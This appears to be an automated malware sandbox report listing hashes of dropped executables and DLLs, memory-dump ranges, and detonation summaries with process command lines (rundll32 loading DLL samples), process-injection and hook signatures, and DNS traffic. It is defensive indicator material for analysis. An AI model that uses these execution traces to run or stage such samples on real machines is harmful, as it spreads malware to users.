| SHA256 | 4965f2e2090f8c49c16f994a7e556814ac07f74ea6de693619de26a6ef40e872 |
| SHA512 | 9f3219ff2eaf5692566ff33264de1127c2835a516af01482008fba91fda690a45ab7ce78471562e32a7dcb3a63c661116c11f631218b85b1dd51ae3af9f87353 |
memory/2640-957-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/1672-971-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\Documents\GuardFox\1AGsAM7Y26Vr36pGSHA98hbO.exe
| MD5 | c2785255a70a9862d959cc73592f74ef |
| SHA1 | 6e401fa6907fca6da01478785e4ff714ca7dfe83 |
| SHA256 | 03e90160536c0ff0af0c1dde94ca528243fcfb5ae99ebffee7005d071dbb7d24 |
| SHA512 | 51800c600fa03caa690db40ac5ac7be732d3a23e1d9137ceded0de1ffc2b60b21f25fab616d35c1a6da653d406fb5d156bc21724ebc9422f4adb70296f257809 |
C:\Users\Admin\Documents\GuardFox\KJFWzmdhqKqcO1aK2C0lM0oL.exe
| MD5 | bd6f68be18db87e17477231c32f8137c |
| SHA1 | 21544e9043e99e630fef5f5e7cfb4a0708a7e0d6 |
| SHA256 | 59885e03435b50b18469c43ffb18951b7b918d2c70be3697fc5c153cef6b06d6 |
| SHA512 | 74763454c75a0d073e6d40fb42d3643bb2152ae70196b89e2204b5a235f664e2108d21b7d848d4705b1dd31bb7d803a67cd44c1e5993612799a53c0fb66976bf |
memory/1344-963-0x0000000004B70000-0x0000000004F68000-memory.dmp
memory/2552-962-0x0000000004A90000-0x0000000004E88000-memory.dmp
C:\Users\Admin\Documents\GuardFox\hHz8UvhmNqdNyZGgBI24N_af.exe
| MD5 | 6f3e7321682ce4ef803555cc137878c1 |
| SHA1 | 4170f6e78a4a6acfd62e6a713562fef4e8e353bf |
| SHA256 | c9afb4eb9bde21cabb36a020f4322893bb8910887781d30b73cbaa3c876ee83e |
| SHA512 | 1f6c186c4dbdedd7417db100e5fe9848518d45cfe12738f95e3bb2dc258c762a1b260fb7e7a58a2aa1668ce06de81418cf9af19cf53c98c77da57d002b32f7b0 |
C:\Users\Admin\Documents\GuardFox\hHz8UvhmNqdNyZGgBI24N_af.exe
| MD5 | 35bae145a5b4970e1f9390c6d7fe2717 |
| SHA1 | 2fcbef4d77328e56176e6284d022182d4dc15500 |
| SHA256 | 10251ee9ea6a1a9a3a732b404a5e46c5df6c2af3d2d879010cd77c1ce4e6fd3f |
| SHA512 | 23e4a1138b67b0142431d66f7dd2b2ced993b43023eda8ad4bf129e36789be9858e46f6dee848ea222894e6dfddf38b9bd5d3b173dcf17f63832fab2df27c275 |
memory/2964-976-0x0000000077830000-0x0000000077832000-memory.dmp
C:\Users\Admin\Documents\GuardFox\hHz8UvhmNqdNyZGgBI24N_af.exe
| MD5 | ca52e80fb811a8f7219510313681241e |
| SHA1 | 94e888816e188d0cb8801e3c49e0c80f4bff7a8c |
| SHA256 | 8b81f39568ce0764762f2e1692f256eec7034cb854c9339f58ca4018d9ea3763 |
| SHA512 | 981fc036839010ede9eb4626b3aa791cda8123cf937514d22df086bbed5380d9562df9ee6bdaa83e22f50a562bed469dea942cfea9e4a47e12cf2f006ad649fb |
\Users\Admin\AppData\Local\Temp\is-7G3C8.tmp\1AGsAM7Y26Vr36pGSHA98hbO.tmp
| MD5 | 40c92a8e43929c9d8f38c1cd29a33d42 |
| SHA1 | d736c68db624fdca36bd8c2b18d4a5cfad25e088 |
| SHA256 | 1bea54b564637c6ea5b30839e6a2d12c3808f5c3e09c664f3aa8a4035cb910f8 |
| SHA512 | 01bf5246ce33b09ac2a47bc0cfb103156fbee5c8e7bf8752d6a99eff83f627ba5ead8be7820b4d126cdca4f180474c069861837e8ab0837ec8037aad0b08f263 |
memory/2552-995-0x0000000000400000-0x000000000311F000-memory.dmp
memory/2184-996-0x0000000000400000-0x0000000002D3F000-memory.dmp
memory/1344-994-0x0000000000400000-0x000000000311F000-memory.dmp
memory/1552-993-0x0000000000400000-0x0000000002D3C000-memory.dmp
memory/1344-992-0x0000000004F70000-0x000000000585B000-memory.dmp
memory/2452-991-0x00000000001B0000-0x00000000001BB000-memory.dmp
memory/2452-990-0x00000000002B0000-0x00000000003B0000-memory.dmp
memory/2184-989-0x00000000001C0000-0x00000000001F4000-memory.dmp
memory/2184-988-0x00000000002D0000-0x00000000003D0000-memory.dmp
memory/2552-987-0x0000000004A90000-0x0000000004E88000-memory.dmp
memory/2452-1009-0x0000000000400000-0x0000000002D3C000-memory.dmp
memory/1344-986-0x0000000004B70000-0x0000000004F68000-memory.dmp
memory/2452-1019-0x00000000001B0000-0x00000000001BB000-memory.dmp
memory/1240-1020-0x00000000021E0000-0x00000000021F6000-memory.dmp
memory/1428-1018-0x00000000001D0000-0x00000000001D1000-memory.dmp
memory/2452-998-0x0000000000400000-0x0000000002D3C000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-SGR2E.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
memory/2964-1013-0x0000000001390000-0x0000000001947000-memory.dmp
memory/1144-997-0x0000000000060000-0x0000000000DE3000-memory.dmp
memory/1552-985-0x0000000000220000-0x000000000022B000-memory.dmp
memory/2640-984-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/1552-983-0x0000000002EC0000-0x0000000002FC0000-memory.dmp
memory/1672-982-0x0000000000400000-0x0000000000414000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-SGR2E.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
\Users\Admin\AppData\Local\Temp\is-SGR2E.tmp\_isetup\_isdecmp.dll
| MD5 | a813d18268affd4763dde940246dc7e5 |
| SHA1 | c7366e1fd925c17cc6068001bd38eaef5b42852f |
| SHA256 | e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64 |
| SHA512 | b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4 |
memory/1552-1021-0x0000000000400000-0x0000000002D3C000-memory.dmp
memory/2964-1044-0x0000000000C60000-0x0000000000C61000-memory.dmp
memory/2964-1045-0x00000000009C0000-0x00000000009C1000-memory.dmp
memory/2964-1073-0x00000000005E0000-0x00000000005E1000-memory.dmp
memory/2964-1077-0x0000000001070000-0x0000000001071000-memory.dmp
memory/2964-1076-0x0000000001320000-0x0000000001321000-memory.dmp
memory/2964-1075-0x0000000001010000-0x0000000001011000-memory.dmp
memory/2964-1074-0x0000000001390000-0x0000000001947000-memory.dmp
memory/2964-1072-0x0000000001020000-0x0000000001021000-memory.dmp
memory/2964-1064-0x0000000000C70000-0x0000000000C71000-memory.dmp
memory/1428-1063-0x0000000000400000-0x00000000004BC000-memory.dmp
memory/1672-1062-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2552-1061-0x0000000000400000-0x000000000311F000-memory.dmp
memory/2964-1060-0x0000000001390000-0x0000000001947000-memory.dmp
memory/1344-1059-0x0000000000400000-0x000000000311F000-memory.dmp
memory/2184-1058-0x0000000000400000-0x0000000002D3F000-memory.dmp
memory/2640-1055-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/1712-1056-0x00000000011D0000-0x000000000181A000-memory.dmp
memory/1144-1090-0x0000000000FC0000-0x0000000000FC1000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSE7A1.tmp\Install.exe
| MD5 | c2a372e02b6327bbaf342052c46f3cde |
| SHA1 | cbe2c5d354f6af699f48d99107df612dc678dda7 |
| SHA256 | 4440d65d26bdcfb5ec6c2c39e1c46a79334f57c43a64f929abcba6e3e7c53f6d |
| SHA512 | f53b3a77a3c5d04644fb27952272211b515b41e373d9408e73ad96e2e260624758db5d57b00bf920d58b833f62ef2a0993364ef1630696c8efd74dc78437c6a9 |
C:\Users\Admin\AppData\Local\Temp\7zSE7A1.tmp\Install.exe
| MD5 | 58cab5bf52fb504b3f59588688c0311d |
| SHA1 | 94e01c814e4c7a80e4c4a74299280e59ee359973 |
| SHA256 | 0bf67a79e2359d3c3cc25d168146f2a1a6c463d842f2d4b263628216ed5f6540 |
| SHA512 | dbce20d0887744762357aec164583fe5943d168ac025f8a1c800b201cb22f1208d435e5f5cd06243e4776cd3cf53596f078e74b95b6c600e22499923512abce8 |
C:\Users\Admin\AppData\Local\Temp\7zSE7A1.tmp\Install.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
\Users\Admin\AppData\Local\Temp\7zSE7A1.tmp\Install.exe
| MD5 | 0546f87c644933402f384d71729b04bf |
| SHA1 | a203ddd527026801c8471d3709054029bf9af57f |
| SHA256 | 8809d9bdb709a13564e73c5a391b14bce9fa3535edd7dc5c32e123d4a7a3ba19 |
| SHA512 | f7bfa275c879f0b19c005c0657c7374cecdf8806275e72cff1cdd5c67e48ea6c5277467baebb766896b3a6e65cb2d88ce032b1f78536cc25362848613dfcbb91 |
\Users\Admin\AppData\Local\Temp\7zSE7A1.tmp\Install.exe
| MD5 | ea64d4a6be3adc60a58a265efa256116 |
| SHA1 | 71d17dc40040eb960c71382b6a1d74a6c9f574d7 |
| SHA256 | cd8a826d8d27be964fff324d502c6cdf567a992118526b8ea078bf0e598a7053 |
| SHA512 | fe2c64e66104adf20aa7934470bdba669f39b9d613e7c0409f19883ba0f7648ca9f5f44ff3a14a7cb60fa457344629a375251e77de3a34d469dc5ebf182dcbbd |
\Users\Admin\AppData\Local\Temp\7zSE7A1.tmp\Install.exe
| MD5 | d7ae760d1d05cb0c45962a594e3bb7f6 |
| SHA1 | 5b766ed71a13204b86a3eab97eda7ce7e2803b72 |
| SHA256 | 24f1244d3cba2b9b71297222f42886c038398054b9e6f4b039c5b68561e45bce |
| SHA512 | f22ac5b5f96b94196c4230470ca55bf73b7f0860708f40aa7ba1964fe40f3088137f1d2b99131eefce392efc47b237726412e521258d73dae96a13d85318737c |
memory/1144-1099-0x0000000000FC0000-0x0000000000FC1000-memory.dmp
memory/1144-1108-0x0000000000FC0000-0x0000000000FC1000-memory.dmp
memory/1144-1111-0x0000000000FD0000-0x0000000000FD1000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS75AD.tmp\Install.exe
| MD5 | 7d79c791f56eab15497c93bb978811c7 |
| SHA1 | d96e8764ce800b637b5c081badf5ebf76c23604d |
| SHA256 | 1cd4a14403c41ddfaaf341c46ba7d9026e0e2dacc0701f9f5e845abd38a30402 |
| SHA512 | 8415246bdec9845c0c8baeaff0ffdd30e46a29fa21970e89a11f639b22f36fb0495a1d15e84efb787c7fb60913e168880c828fed3efce8e474a49b8a9211914b |
C:\Users\Admin\AppData\Local\Temp\7zS75AD.tmp\Install.exe
| MD5 | 40890ae2e936472ca485ad31225693b2 |
| SHA1 | 61363a721cb4d6dd7ae7920e34b04095b7b84dea |
| SHA256 | 741198168dfe745aa6b016fc57d24832a76fc39988d9e36930a20c53357e5248 |
| SHA512 | 6ae93478d0ec97ee211d219c10113aac77449623e3596b7928eea69098e1918b07a3b9d9e84e57a6f992f677a9664ba13e7a734c9125cfb36c1a454a1289fe2b |
\Users\Admin\AppData\Local\Temp\7zS75AD.tmp\Install.exe
| MD5 | 9c28b329e702adbca7d0b7d25f5f0cca |
| SHA1 | 64ae19084eeb8a68f40a1196b23c44f74af50af9 |
| SHA256 | bb588c90fd88dec701bb342cb5d22bbcad9a0ef5f4030e4ee13699506b32ff81 |
| SHA512 | df6c132066d395f560b36ea74a0eb53c66c878c4796c3a3f2f93f5373093c4a9e86b84ed30812b406f24a2dab811a0e20da2a0fbefdf74d73ea45a1340133c14 |
C:\Users\Admin\AppData\Local\Temp\FF07.exe
| MD5 | 3724451ec0294249242ae38e1a0f7b25 |
| SHA1 | b5106f25f9947400c8db8f7029dee557da099fd1 |
| SHA256 | 77cb2044cbc967ba492850d177c98f3deb468a321e2adfd476783c52dbfa4fbf |
| SHA512 | c1f7edb15d5847a4ae2e313178a688237ba79eb971be9e25dbce066a7db96bebbfc57c39f25fed848deb8fd3ca277b274d082f57a34d5f154e76a885021fad84 |
C:\Users\Admin\AppData\Local\Temp\FF07.exe
| MD5 | 4eb40f1a33f203f8dff454c3f3be4b46 |
| SHA1 | 70fa6b39f06c95f3fda8c21ace5510a896d7fe1a |
| SHA256 | 0604f07976533d0969a7ab0d54f521702dbd9176145a813be284d8c7de1e8a20 |
| SHA512 | 47cb541879aa2e438df0ddbcfb9b4e821a8b09d82e97a3ba7d6aa42db7f19a370c6a5e1caa95be63c6620c1052a24ebeca733476a597b1fbd054f9ab89b41308 |
C:\Users\Admin\AppData\Local\Temp\FF07.exe
| MD5 | d8c737fe89b9cd71eda2cb96c53f058a |
| SHA1 | e1f7acc79a8aa902c1c6b913c6dd71383ba3a6b4 |
| SHA256 | f73452f0f414bca5f67f9a4d3e9b37284961bc7cacdbc7a6ee19a53e9a3d91da |
| SHA512 | 900fca6f0d356ef4ba1567c2db0373e649ec7192e2237201d6c6ae7168d5d171335764ad9d3b3e8a8b3b9eb8e3900ce1ec38dd7a1b33a0e3a608e23c64cd54a0 |
C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdesc-consensus.tmp
| MD5 | 3384df11645214991c43cc79c6162542 |
| SHA1 | 0c0eb94d9f00aa8388134b56f5518549772941d5 |
| SHA256 | c16d54482c78c77562c21f8a2e2463360d923c208cad1c80826bf8267182453a |
| SHA512 | 0faf6bae1e84efde2e197b31678e52dc74dde930852810b3b5db01148faa92efb1841b46a831fd4e73f2d67df27f1dbadb3111f1bf8272a965976a74b8988c68 |
C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdescs.new
| MD5 | e05046201fd81921b7688a29b9c61cbc |
| SHA1 | 04bd579b42bd45156569ad63e5a23893a316c0c4 |
| SHA256 | 1324d67ba05fc87d734c72dbee505e7cd8402766d39d0408d36ed97f93b0e37a |
| SHA512 | 6081c0b628a9b7da96856c1ceff2ff8e9994d49e356edcbd871d5fd6659914d55e78e4c0d492a8385a79ad1dfc52e5920556ee177a3d5d606cd0781cfda7771e |
C:\Users\Admin\Documents\GuardFox\RfHaLGAD1f_KWSrCQe5tWOzu.exe
| MD5 | 7e6d304f94b7413e05462a6256ebfd3a |
| SHA1 | 771ad41ac14c3d4ea101e94a088dcb95fc22a1e9 |
| SHA256 | 1da512678c1343da62b47af2859849816d8e6a1943306c5f345091e719510fe6 |
| SHA512 | b6fb6c47412ddda4c33fe429a29d11355abcbc0bbc3b51aacfcb452ac9f7b30eabf72df8a2a1346224d751747c3dc08553416949597d2836094dc6babde0bf93 |
C:\Users\Admin\Documents\GuardFox\_WmA4UeHN2lS8kJMKSI_Okk5.exe
| MD5 | 75fd41e8b9312cdc5e12869b3f8e120a |
| SHA1 | 7ad734927bb5f359d1d710f51508cb24cdec73d9 |
| SHA256 | 25d1dc125433097e2fcacc0892ac2ccf4c0e378eff2cc3f6881992f2641e8d03 |
| SHA512 | 94cff0b426135678f4efc1610aaed8ce659189d28cb6b4d4e9a9fd868ec87227327c1cf53284719dce3d4c4aad97ae0b1b1c734ae9250afaf2d00c8700eaeab8 |
Analysis: behavioral5
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:49
Platform
win7-20240221-en
Max time kernel
117s
Max time network
132s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2956 -s 228
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:48
Platform
win10v2004-20240221-en
Max time kernel
149s
Max time network
154s
Command Line
Signatures
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe
"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:48
Platform
win7-20240215-en
Max time kernel
117s
Max time network
121s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1204 wrote to memory of 1244 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1204 wrote to memory of 1244 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1204 wrote to memory of 1244 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1204 wrote to memory of 1244 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1204 wrote to memory of 1244 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1204 wrote to memory of 1244 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1204 wrote to memory of 1244 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1